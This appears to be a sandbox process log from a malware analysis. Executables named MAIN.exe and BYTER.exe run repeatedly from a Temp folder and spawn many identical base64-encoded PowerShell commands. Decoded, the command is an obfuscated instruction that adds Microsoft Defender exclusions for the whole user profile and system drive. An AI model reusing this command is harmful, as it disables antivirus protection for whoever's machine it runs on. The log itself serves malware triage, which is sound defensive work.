"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-358902365948312753863198500276121551-160505813818928297931922359574-1072181426"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6688185441245147572-776670553-20337787802058778457-2047499821-1255277638-1129605797"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1784115463-2000515224-1938884843-885390482-930745074148145954-8149088231980488001"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
